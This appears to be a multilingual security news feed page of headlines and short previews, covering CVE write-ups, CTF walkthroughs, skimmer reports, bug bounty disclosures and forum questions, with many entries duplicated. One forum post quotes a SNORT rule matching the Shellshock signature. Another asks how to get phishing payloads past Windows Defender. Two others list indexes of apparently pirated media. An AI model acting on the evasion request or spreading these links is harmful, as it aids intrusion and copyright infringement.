    5月5日,SentinelLabs 发布存在报告称,他们曾在知名防病毒产品Avast 和 AVG 中发现了两个时间长达近10年的严重漏洞。
    FreeBuf早报 | 新REvil勒索软件操作样本背后的奥秘;乌克兰战争主题文件成黑客首选
    美国国防部欺骗网络钓鱼者支付 2350 万美元。
    证监会发布《证券期货业网络安全管理办法(征求意见稿)》
    《办法》共八章六十六条,包括证券期货业网络安全监督管理体系、网络安全运行、数据安全统筹管理、网络安全应急处置等多方面内容。
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview

  • Open

    【安全通报】F5 BIG-IP iControl REST 身份认证绕过漏洞(C...
    近日,F5 官方发布了 BIG-IP 产品的安全公告并曝光了一个远程身份认证绕过漏洞,未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访...
  • Open

    【安全通报】F5 BIG-IP iControl REST 身份认证绕过漏洞(C...
    近日,F5 官方发布了 BIG-IP 产品的安全公告并曝光了一个远程身份认证绕过漏洞,未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访...
  • Open

    From KBs to CVEs: Understanding the Relationships Between Windows Security Updates and Vulnerabilities
    submitted by /u/derp6996 [link] [comments]
    An Easy Misconfiguration to Make: Hidden Dangers in the Cloud Control Plane
    submitted by /u/ajohnston9 [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    submitted by /u/digicat [link] [comments]
  • Open

    Passed the GCFE exam today
    So glad to get this behind me, now I need to begin applying the information/knowledge and keep learning. submitted by /u/ATXChimera [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Starting a DF business...how much work is out there?
    Title pretty much says it all. If someone wanted to be a principal consultant...how much work is out there? submitted by /u/invictusliber [link] [comments]
  • Open

    Creating a SNORT shellshock rule
    I’m creating a SNORT rule to block shellshock, every time I run this code, I get that it needs to be enclosed in ‘(‘ ‘)’. Like it is in brackets? What am I doing wrong? Alert tcp any any -> $HOME_NET 80 443 (msg: “Shellshock activated”; content: “() {“; sid: 10000000;) Any tips? submitted by /u/LewSm1th [link] [comments]
    Looking for SANS SEC 504 GCIH practice tests.
    Does anyone have any extras to share? submitted by /u/Striking-Regular-725 [link] [comments]
  • Open

    AMB Bridge: bug bounty program
    As you may already know, we have recently launched the AMB bridge on the Ambrosus testnet! Continue reading on Ambrosus Ecosystem »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on Medium »
    You should put scope over exploits! Or should you?
    Continue reading on Medium »
    I have 1% chance to hack this company
    Today I will share with you the first vulnerability I found on SerpApi, LLC. Continue reading on InfoSec Write-ups »
    My Pentest Log -17 - (Stack Trace in ASP.NET)
    Greetings from Perama to all, Continue reading on Medium »
    My First Bounty in Hackerone
    Hi my name is jagannath mohanty .i want to tell you my first bounty of hackerone lets jump the bug reported it was user/email enumeration… Continue reading on Medium »
  • Open

    What's everyone's favorite phishing framework/tool?
    I think GoPhish is the most popular. I'm going to be playing around with as many as I find over the weekend. I wanted to get some feedback on any favorites you may have used; pros & cons; etc. Thanks in advance for any feedback! submitted by /u/offftherecordz [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    What way is currently best for SE payload attacks?
    Microsoft did a huge crackdown on the "evil macros" on office docs about 9 months ago. https://www.zdnet.com/article/microsoft-...el-macros/ It now seems that ANY attempt of creating a shell object on VBS instantly gets flagged by windows defender. This used to be bypassed by using an "external" program to create such shell i.e: Outlook. So, how can I send my payload now? Sending exes in mail is frown upon by any spam agency and a plethora of alerts pop up when I do so. Sending a .bat is too sketchy as well and the .lnk trick has been also fixed. submitted by /u/ErikDz11 [link] [comments]
  • Open

    A brief introduction to OSINT (Open Source Intelligence)
    There are many different types of intelligence, but one that is used to be overlooked is open source intelligence (OSINT). Despite being… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-05 Review
    RASP 如何检测Java Agent 内存马 by ourren 一文读懂https中密钥交换协议的原理及流程 by ourren UEBA(用户和实体行为分析)可以用来做什么(十大场景) by h4ck01 云安全基线 by h4ck01 Botconf 2022 议题速递 by Avenger 利用代码知识图谱实现Bug定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-05 Review
    RASP 如何检测Java Agent 内存马 by ourren 一文读懂https中密钥交换协议的原理及流程 by ourren UEBA(用户和实体行为分析)可以用来做什么(十大场景) by h4ck01 云安全基线 by h4ck01 Botconf 2022 议题速递 by Avenger 利用代码知识图谱实现Bug定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    Manually Identifying an X-Cart Credit Card Skimmer
    During a recent investigation, a new client came to us reporting that their antivirus had detected a suspicious domain loading on their website’s checkout page. We regularly receive reports like these, as this is a telltale indicator of a credit card skimmer infection. Our research and remediation teams frequently find credit card skimmers on Magento websites, and more recently on WordPress — however, in this case the customer was using a lesser known eCommerce solution known as X-Cart. Continue reading Manually Identifying an X-Cart Credit Card Skimmer at Sucuri Blog.
  • Open

    DATA INDEXES | 100TB+ DATA COLLECTIVELY | ANIME,COURSES,MOVIES,GUIDES,DBS
    https://gdriveindex.mrdeveloper.workers.dev/0:/ https://mirror.mrha.tk/0:/ https://torrent2drive.video/0:/ https://punishermirror.punisher876.workers.dev/0:// https://sdfmirrorbot2.sdfmirror.workers.dev/0:/ https://sinnerdrive.jack-need-boost.workers.dev/0:// https://drive.movietrigger.workers.dev/0:/ https://arcrec.mark41stark.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://td.lightdrive.workers.dev/1:/ https://otmbd01.sasohan.workers.dev/ https://animelibr.cooldude69.workers.dev/1:/ https://www.savage69.workers.dev/0:/ https://sauraj.rommirrorer.workers.dev/0:/ https://thanosdrive-v2.moviezclub-thanos...rs.dev/0:/ https://megamirrorsakura.iamrehan2064593...rs.dev/0:/ https://cloud.eleventh-hour.workers.dev/0:/ https://drive.spidercloud.workers.dev/1:/ https://sonic.otakus.workers.dev/0:/ https://one.thebayindex.tk/ submitted by /u/9NAAGRAAJ [link] [comments]
  • Open

    PyScript와 Security 🐍🗡
    최근 PyCon US 2022의 발표 중 PyScript가 공개되었습니다. PyScript는 HTML에서 Python 코드를 사용할 수 있도록 제공하는 라이브러리로 최근 엄청난 범용성과 낮은 러닝 커브를 가진 Python이 웹으로 확장하는 부분이라 관심도 많고 말도 많습니다. HMLT 내부에서 코드를 쓰는 방식이 PHP와 뭐라 다르냐란 이야기도 있습니다. 오히려 시대를 역행한다는 이야기도 봤던 것 같네요. 디자인 패턴이나 코드에 대한 내용은 개발자분들이 많이 신경쓰실 내용이고, 우리는 보안 엔지니어링이니 보안쪽 관점에서도 한번 살펴봐야해서 요 며칠 가볍게 고민해보고 글로 작성해봅니다.
  • Open

    微软NetLogon特权提升漏洞(CVE-2020-1472)深度挖掘
    该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。
    深入了解Psexec与SMBexec
    从利用方式、日志分析等方面深入了解Psexec、smbexec。
    FreeBuf早报 | DNS高危漏洞影响百万物联网设备;Deepfakes对网安全的威胁增大
    uClibc库的域名系统 (DNS) 组件中存在一个高危漏洞,全球数百万台使用uClibc库的物联网设备都也将受到影响。
    设备接管风险警告!F5发现一个关键BIG-IP远程执行漏洞
    近日,应用交付领域(ADN)全球领导者F5公司发布了一项安全警告,其研究团队监测到一个关键漏洞正在被积极利用。
    “8220”挖矿组织活动分析
    “8220”是一个长期活跃并且擅长使用漏洞进行攻击并部署挖矿程序的组织。
    死灰复燃!新型REvil勒索软件在野攻击活动分析
    2022年1月俄罗斯FSB称在美国提供的相关信息后他们彻底毁灭了REvil并抓捕了几名人员。
    DNS曝高危漏洞,影响数百万物联网设备
    通过该漏洞,攻击者可以进行DNS中毒或DNS欺骗攻击,并将受害者重定向到恶意网站而不是合法网站。
    攻击者劫持英国NHS电子邮件帐户以窃取Microsoft登录信息
    据调查,在近半年的时间里,英国国家卫生系统(NHS)的100多名员工的工作电子邮件帐户被多次用于网络钓鱼活动,其中一些活动旨在窃取Microsoft登录信息。在劫持合法的NHS电子邮件帐户后,这些攻击者于去年10月开始使用它们,并至少在今年4月之前将其继续用于网络钓鱼活动。据电子邮件安全INKY的研究人员称,已经从英格兰和苏格兰员工的NHS电子邮件帐户发送出1000多条网络钓鱼邮件。研究人员跟踪了
    攻击者部署后门,窃取Exchange电子邮件
    某 APT 组织入侵企业网络,并试图窃取参与企业交易员工的Exchange电子邮件。
    GitHub:2023年底前所有用户账户需启用双因素身份验证
    5月4日,GitHub 宣布,所有上传代码的开发者及用户账户必须在2023年底前启用一种或多种形式的双因素身份验证 (2FA)。
  • Open

    Github Account Takeover which is used as gradle vcs in "github.com/palantir/gradle-launch-config-plugin"
    Palantir Public disclosed a bug submitted by codermak: https://hackerone.com/reports/1525578 - Bounty: $250
  • Open

    LoNg4j: New Log4j Vulnerability
    Article URL: https://www.cequence.ai/blog/long4j/ Comments URL: https://news.ycombinator.com/item?id=31273048 Points: 4 # Comments: 0
  • Open

    I am starting college, should I start with binary exploitation or web app exploitation, to get jobs and internships? though I do love binary exploitation but not many jobs in ireland
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    which target to pick after learning basics of binary exploitation? if there is any bug bounty ? sorry if it's lame question
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    QUESTION
    Hello,everyone. First of all, I want to apologize for my nooby question For a while I've been reading about exploit development. since this field is incredibly interesting to me anyway, i came across a video called "The Layman's Guide to Zero-Day Engineering" on youtube ( i wanted to put the link but idk if it's allowed) and I was fascinated by the way they developed the exploit for the safari browser so i was wondering if exploit developers know every language ??? i tried to google my question but i didn't found an answer Do professionals have to know the programming language to be able to code the exploit? For example, when you write an exploit for (Linux) C you have to know c, but let's say, for example, you want to code an exploit for JIT or V8. Do you learn JavaScript or do you apply the same knowledge to every exploit regarding the language ? TL;DR ( is exploit development independent of language? ) . Thank you everyone submitted by /u/IBK_0 [link] [comments]
  • Open

    从 PWN2OWN CVE-2022-27666 看内核页风水
    作者: f-undefined团队 v1n3gar 原文链接:https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg 知识点: (1)使用 msg_msg 构造任意写来篡改 modprobe_path,通过 FUSE 来处理页错误(克服5.11版本之后用户没有userfaultfd权限的问题,肯定有一大波CTF题将要效仿)。 (2)由于漏洞对象位于...
    CVE-2022-21882 Win32k 内核提权漏洞深入分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1.漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win3...
  • Open

    从 PWN2OWN CVE-2022-27666 看内核页风水
    作者: f-undefined团队 v1n3gar 原文链接:https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg 知识点: (1)使用 msg_msg 构造任意写来篡改 modprobe_path,通过 FUSE 来处理页错误(克服5.11版本之后用户没有userfaultfd权限的问题,肯定有一大波CTF题将要效仿)。 (2)由于漏洞对象位于...
    CVE-2022-21882 Win32k 内核提权漏洞深入分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1.漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win3...

  • Open

    Hack To Learn: OSINT and Passive Reconnaissance
    Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Continue reading on System Weakness »
    War in Ukraine / May 3
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Something from the internet…
    Anonymous web browsing, chatting or just being online can be achieved by mixing different OS configurations such as Tails and Qubes OS… Continue reading on Medium »
    Keeber NahamCon CTF 2022 [OSINT]
    Keeber 1 Continue reading on Medium »
    NahamCon 2022 CTF — Keeber 1, 2, 3, 5
    As part of NahamCon 2022, a 48-hour CTF event was hosted leading up to security conference itself. Continue reading on Medium »
  • Open

    Clickjacking Vulnerability Can Leads To Delete Developer APP
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1416612 - Bounty: $500
    One Click Account Hijacking via Unvalidated Deeplink
    TikTok disclosed a bug submitted by fr4via: https://hackerone.com/reports/1500614 - Bounty: $10000
    URL Scheme misconfiguration on TikTok for IOS
    TikTok disclosed a bug submitted by glassplant: https://hackerone.com/reports/1437294 - Bounty: $500
  • Open

    How i found a vulnerability that leads to access any users’ sensitive data and got $500
    Hello everyone! Continue reading on Medium »
    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
    Business Logic Errors - Art of Testing Cards
    Summary : Continue reading on Medium »
    CVE-2022–25262
    CVE-2022–25262 Continue reading on Medium »
    Information leakage in EXIF data of images(EXIF Data Exposure)
    Summary : Continue reading on Medium »
    Hack the HAckers
    While reading my feeds I came across “hacking the hackers” Heading , so I think lets try finding bugs on THM ( Try HacK Me ) . Continue reading on Medium »
  • Open

    Block all user agents with modsecurity except one?
    I want to block all user agents from my server except for one specific user agent string. How would I create a rule(s) to do this? Thanks! submitted by /u/BelugaBilliam [link] [comments]
    Huawei Network device compliance audit
    Hello!! I am looking for some guidance on how to conduct CIS compliance scans for my Huawei network devices. I use a bunch of other tools such as tripwire, nexpose and some NSPMs for non-Huawei nodes but Huawei devices are not supported by anyone of them(atleast out of the box). Any guidance? Thanks. submitted by /u/Due-Brick6204 [link] [comments]
    Overcoming imposter syndrome very early on
    After getting some help desk experience I decided to apply to more security focused roles and have been given an interview as a security consultant. I am very nervous and because of this I am already considering whether I will be good enough. It will be the longest interviews I’ve done in my life (1hour+). I do not meet most of the desirable skills maybe about 3/5. How can I overcome this and how should I prepare well? I really want this role as I want to push myself. The interview will be held by a senior in the company so don’t want to say anything silly and completely mess up the interview submitted by /u/amvn92 [link] [comments]
    I fucked up and I don't know what to do, please, I need advice
    I recently started browsing r/hacking and I saw a video about a streaming site that started recently, the site was heavily publicized by a YouTuber for it's horrible UI, I visited it to see if the site was so ugly for real. I went to Google and searched for "test site online" and I found a website that let's you run a (not full) security check, just checks if the site is HTTPS and so on, I also found right after that one a site that said SQLMAP test. The site had just three options: A URL textbox A Submit button A Reset button I put the site there and the site had two popup were shown, the first site said: no major issues and the second one printed a log and a popup was shown "you must be authorized to use this on the site". I don't even fucking know what SQLMAP was before I looked for it after the popup came to the foreground. Am I going to jail? I had a panic attack and I cried one hour, I was just browsing my phone and I thought it was fun to see if the site was botched or not. I'm panicking, what's wrong with me submitted by /u/__subroutine__ [link] [comments]
  • Open

    Write Blocker
    What write blocker do you recommend using when creating a forensic image of a drive? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    GCFA failed :( help required
    Hi guys recently failed my gcfa after getting around 60%. I think made a mistake of frequently referring index and books and at the end left out with 5 lab questions. Now I’m planning to re-appear for the exam. Anyone can guide me or any leads of what I’m missing or need to cater out? Thanks PS. Got above 75% in both practice exams submitted by /u/Mushroom-Fuzzy [link] [comments]
    GCFA Poster Question
    I will be taking my GCFA exam soon and was wondering which posters you printed out that were most helpful to you? Thank you submitted by /u/joe_dro [link] [comments]
  • Open

    Cyberwar In Ukraine Hackers Are Hacking Russia
    submitted by /u/cybersocdm [link] [comments]
    Hacking Power Plants and Industrial Control Systems
    submitted by /u/cybersocdm [link] [comments]
    Update on cyber activity in Eastern Europe
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-05-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    ELFLoader: Another In Memory Loader Post
    Intro Now that BOFs are commonplace for Windows agents, some people have talked about wanting a non-Windows only version. In this blog post, we’ve got something for you: the same thing but for Linux/Mac. The process of building in memory loaders are the same, no matter the file format type. In this case, we’ll just... The post ELFLoader: Another In Memory Loader Post appeared first on TrustedSec.
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    Big Collection For Anime Fans
    15TB of anime (series-movies) https://drive.google.com/drive/folders/1vSdJo_OrJNgVIRYsvTwR-PeLyM8L-V0M submitted by /u/NELARO [link] [comments]
  • Open

    Shady economics of proxy services
    submitted by /u/rushter_ [link] [comments]
    Authenticating with certificates when PKINIT is not supported
    submitted by /u/the-useless-one [link] [comments]
    Themes from Real World Crypto 2022
    submitted by /u/yossarian_flew_away [link] [comments]
    Exploiting Dynamic Linking Procedure In x64 ELF Binaries
    submitted by /u/paran0ide [link] [comments]
  • Open

    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
  • Open

    FreeBuf早报 | 普京下令各部门机构设立IT安全部门;亲乌黑客对俄网站进行 DDoS 攻击
    普京签署确保俄罗斯信息安全额外措施的总统令,下令在每个部门、机构和骨干组织里设立IT安全部门。
  • Open

    Critical vulnerability in the Matrix IRC bridge
    Article URL: https://matrix.org/blog/2022/05/04/0-34-0-security-release-for-matrix-appservice-irc-high-severity/ Comments URL: https://news.ycombinator.com/item?id=31257915 Points: 91 # Comments: 13
  • Open

    Putting It All Together
    It's great when a plan, or a puzzle, comes together, isn't it?  I'm not just channeling my inner Hannibal Smith...I'm talking about bringing various pieces or elements together to build a cohesive, clear picture, connecting the dots into a cohesive analysis. To kick this off, Florian had this to say about threat actors moving to using ISO/IMG files as result of Microsoft disabling VBA macros in docs downloaded from the Internet, a change which results in entirely new artifact constellations. After all, a change in TTPs is going to result in changes as to how the system is impacted, and a change in the resultant constellations. So, this sets the stage for our example. In this case, the first piece of the puzzle is this tweet from Max_Mal_, which points to the BumbleBee campaign (more info f…

  • Open

    Master or Certs
    Hey Everyone, I am graduating in August with my Bachelor’s in Computer Forensics/Digital Investigations. Is it better to stay and get my Masters or graduate with a Bachelors and work on getting some certificates? Thanks! submitted by /u/chungusXL316 [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Useful Security Tools and Resources for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
    Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk
    submitted by /u/39816561 [link] [comments]
    Privilege escalation vulnerabilities discovered in Linux known as Nimbuspwn
    submitted by /u/sciencestudent99 [link] [comments]
    New update from Google's Threat Analysis Group finds numerous APTs running campaigns in Ukraine and Est. Europe, including Fancy Bear (Russia), Ghostwriter (Belarus) and Curious Gorge (China).
    submitted by /u/Ramsey_Power [link] [comments]
    Compromising Read-Only Containers with Fileless Malware
    submitted by /u/MiguelHzBz [link] [comments]
    AvosLocker Ransomware Variant Abuses Avast Anti-Rootkit Driver File to Disable Anti-Virus
    submitted by /u/campuscodi [link] [comments]
    Zyxel firmware extraction and password analysis
    submitted by /u/0xdea [link] [comments]
    Hacking a Bank by Finding a 0day in dotCMS
    submitted by /u/Mempodipper [link] [comments]
    DOing Harm
    submitted by /u/netsecfriends [link] [comments]
  • Open

    Can someone find me by my Bluetooth address knowing only my phone number?
    I’m a bit confused and shocked about what happened. TD;LR: Someone sent me a message on WhatsApp saying are you at this coffee shop? And yes I was Here is the story: I’m a freelancer and I took a gig from someone who I have never met. I added his number on my phone to my contacts and we been texting on WhatsApp regrading the gig. That was in 2019 and the gig lasted for about a couple months. Fast forward 2022 a few days ago, I was at a coffee shop and I got a text on WhatsApp from that person asking me if I’m at that same coffee shop! I told him yes but how did you know? He said “I turned on my Bluetooth to connect to my headphones and it showed me that “my name” is nearby” (the name he saved on his contacts) Some facts: -That person never heard my voice -He does not know how I look like -I have an iPhone (idk what phone he has) -my Bluetooth name is “iPhone” (not unique) I’m mind blown how did that happen and if he is actually telling the truth? Does WhatsApp maps my Bluetooth address to my phone number somehow? (Or maybe a different app) I know it’s theoretically possible but as far as I know, Apple iOS does not allow that kind of mapping submitted by /u/i_R7AL [link] [comments]
    Not able to connect with DNS server
    Hi all, I have a problem with my laptop since two days ago which basically is that I can't use any browser because a message appears saying "We have problems to find that site" and then it says, "We can't connect to (Website searched)". I've tried some things like resetting the DNS cache, also resetting the router and more possible solutions I found on the internet, but none of them worked. I use Mozilla Firefox and it does have this problem, and tried with Google Chrome and Microsoft Edge and also have the same problem. The curious thing is that I can use Tor Browser without any problem and make the daily use if it. I also used the problem solving system from the computer and executed it to find any problem with the internet connections, after that the problem is that the DNS server is not responding, but also says that it is a problem that can't be solved automatically by the system. Also, I tried to scan my computer with the Avast antivirus program and the computer is not able to open it so I can't scan in case there is any virus or malware. I used the Microsoft scan that comes with the system and it says that there is no virus or malware found. I also just saw that some apps like Steam or Netflix are not working because are also not recieving signal from the DNS server I suppose and for that reason don't have internet. Thank you for reading and for trying to figure out a solution, I need my laptop running as always for school work and projects so every help you can give me would be great. submitted by /u/12d12g [link] [comments]
    Introducing security processes in a company from the ground-up
    Hey all, Recently, I had a discussion with one of my colleagues about introducing some security processes in our organization. It has been in the pipeline for some time now but and we figured that we should probably start working on it while the company is not that big. Plus, we started seeing some occasional DDoS attacks recently (nothing too mayor or disruptive, but enough to bring up some alarms). What I am curious about is: How would you tackle this problem? How would you prioritize tasks that should be done? How would you get non-tech people onboard to follow those best practices? What are some technical solutions that come to mind? To put some context to all of the above: the company doesnt hold any sensitive data (medical records, financial records or credit card numbers), although, I would like to hear your opinion on those as well. We are an e-learning platform with some significant user base and people do follow some obvious best practices, like: using password managers, using 2FA (not enforcing it though, but we should), giving access to resources only to people that really need them to perform their job, doing frequent backups, etc. I am a dev with some nice and broad experience in the field. Even tho I can navigate myself around IT concepts and security, I've never actually worked in a role and I dont really know where to start, so any help is much appreciated. :) submitted by /u/d_lipovac [link] [comments]
    Insecure Request Practice
    Hi guys ! I saw a practice one of these days which involved adding user and password to the headers of a request and encoding them with base64. Is this actually correct? if not what would be the best way to fix it? I feel like that way of doing it is quite insecure submitted by /u/Mokushi99 [link] [comments]
    Block legacy protocols for Microsoft applications
    Hi there. I want to block all the old protocols, but I'm afraid that this could lead to availability risks for some applications. Right now I see that only one application Office 365 Exchange Online is using legacy protocols: IMAP Exchange Web Services SMTP Exchange ActiveSync MAPI Over HTTP Offline Address Book Autodiscover Exchange Online Powershell POP How to understand whether there will be risks in the usage of Office 365 Exchange Online if I will block legacy protocols? https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication submitted by /u/athanielx [link] [comments]
  • Open

    Etcd Integrates Continuous Fuzzing
    Article URL: https://www.cncf.io/blog/2022/04/13/etcd-integrates-continuous-fuzzing/ Comments URL: https://news.ycombinator.com/item?id=31254099 Points: 1 # Comments: 0
    Fuzzing Like a Caveman
    Article URL: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/ Comments URL: https://news.ycombinator.com/item?id=31249559 Points: 2 # Comments: 0
    Advanced Go Fuzzing Techniques
    Article URL: https://blog.fuzzbuzz.io/writing-effective-go-fuzz-tests/ Comments URL: https://news.ycombinator.com/item?id=31249130 Points: 3 # Comments: 1
  • Open

    Ni Macron, ni Le Pen
    France election results and the country’s political void Continue reading on Medium »
    War in Ukraine / May 2
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Free applications and services for security specialist…
    Let’s talk about those free applications and services that a security specialist should definitely put on a smartphone and computer. First… Continue reading on Medium »
    Maltego Transforms List
    A list of tools that handle different data and make it usable in Maltego. Continue reading on Medium »
    Information gathering from instagram accounts
    hellow guys my name is arshia and im comming with another interesting tutorial and in this tutorial you will learn how to gather… Continue reading on Medium »
  • Open

    How I got a lousyT-Shirt from the Dutch Goverment.
    Hello everyone,  my name is Max. I’m a Computer Science student and ethical hacker from Germany. Today I want to tell you how I hacked the… Continue reading on Medium »
    Denial of Service through …
    Today let us learn about Denial of service Continue reading on Medium »
    A Guide For Advanced Message Protected API Hacking Using Hackvertor and Burp (part 2)
    More up-to-date Hackvertor game-changer techniques, code examples, and tips for advanced API penetration testing and bug bounty. Continue reading on Medium »
    Open Redirect Vulnerability
    We’ll begin our discussion with open redirect vulnerabilities, which occur when a target visits a website and that website sends their… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Flaskmetal Alchemist ( Medium) Continue reading on Medium »
  • Open

    Apple Silicon Exclusively Hit with World-First “Augury” DMP Vulnerability
    Article URL: https://www.tomshardware.com/news/apple-silicon-exclusively-hit-with-world-first-augury-dmp-vulnerability Comments URL: https://news.ycombinator.com/item?id=31252031 Points: 2 # Comments: 0
    Responsible Disclosure: 6000 Vulnerability Submissions Later
    Article URL: https://www.danielmakelley.com/responsible-disclosure-6-000-vulnerability-submissions/ Comments URL: https://news.ycombinator.com/item?id=31251551 Points: 3 # Comments: 0
    Vuls: Agent-less vulnerability scanner for Linux, FreeBSD
    Article URL: https://github.com/future-architect/vuls Comments URL: https://news.ycombinator.com/item?id=31250171 Points: 18 # Comments: 1
  • Open

    SecWiki News 2022-05-03 Review
    如何写科研论文? by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-03 Review
    如何写科研论文? by ourren 更多最新文章,请访问SecWiki
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    WooCommerce Credit Card Skimmers Concealed In Fake Images
    Our research and remediation teams have noticed an increase in WooCommerce credit card skimmers on client sites over the past few years, as detailed in past blog posts. Due to the increased number of plugins and components facilitating online payments and its ease of use, WordPress has become a common e-commerce platform — and the frequency in which the popular CMS is being targeted by attackers aiming to steal sensitive personal information and credit card details is also accelerating. Continue reading WooCommerce Credit Card Skimmers Concealed In Fake Images at Sucuri Blog.
  • Open

    ZAP HTTP Sessions를 통해 간편하게 세션 기반 테스팅하기
    ZAP에는 HTTP Sessions라는 기능이 있습니다. 이름과 옵션에 있는 내용을 보고 세션 처리 관련된 기능이구나 생각만 했지 실제로 한번도 사용해보지 않았던 기능입니다. 오늘 놓친 기능이 있을까 싶어서 메뉴를 돌아다니던 중 발견하여 테스트해봤는데 생각보다 테스팅의 불편함을 줄여줄 수 있는 부분으로 보여서 글로 소개해드리려고 합니다 :D HTTP Sessions HTTP Session는 이름 그래도 HTTP에서 사용하는 Session을 ZAP이 자동으로 인지하고, 이를 기반으로 다른 액션에서 사용할 수 있도록 제공하는 기능입니다. 단순히 말로만 설명하면 감이 잘 안올텐데요, 아래 순서로 한번 어떤식으로 사용하는지 보면서 이야기해보죠.
  • Open

    Blind XSS via Feedback form.
    Judge.me disclosed a bug submitted by b3hlull: https://hackerone.com/reports/1339034 - Bounty: $1250
    Self-DoS due to template injection via email field in password reset form on access.acronis.com
    Acronis disclosed a bug submitted by sudo_bash: https://hackerone.com/reports/1265344
  • Open

    How to conduct VAPT?
    How to conduct a VAPT? Continue reading on Medium »

  • Open

    HTB[CTF]: Lame [Easy]
    Vamos iniciar nossa CTF realizando o reconhecimento do ambiente na qual iremos enfrentar… Partiremos pela varredura de portas: Continue reading on Medium »
    HTB[CTF]: Pennyworth [Easy]
    Vamos iniciar realizando uma varredura de portas básica em nosso alvo, vou utilizar o nmap para isso. Continue reading on Medium »
    Fun with DLL’s — Part 1 — DLL Search Order Hijacking
    This post is part of a new series I’m starting titled “Fun with DLL’s” where I will dive into the specifics of Windows DLLs. In this… Continue reading on Medium »
    Red Team Powershell Scripts
    Various PowerShell scripts that may be useful during red team exercise Continue reading on Medium »
  • Open

    My iPhone is making calls to kozow.com
    Should I be worried? From my research it is a c2 of some malware. Any advice or check? submitted by /u/punto2019 [link] [comments]
    Is there a simple way to easily verify which download link on a site ( with multiple 'download buttons' ) is the correct one ?
    Cheers! submitted by /u/Unusual-Resolve-7521 [link] [comments]
  • Open

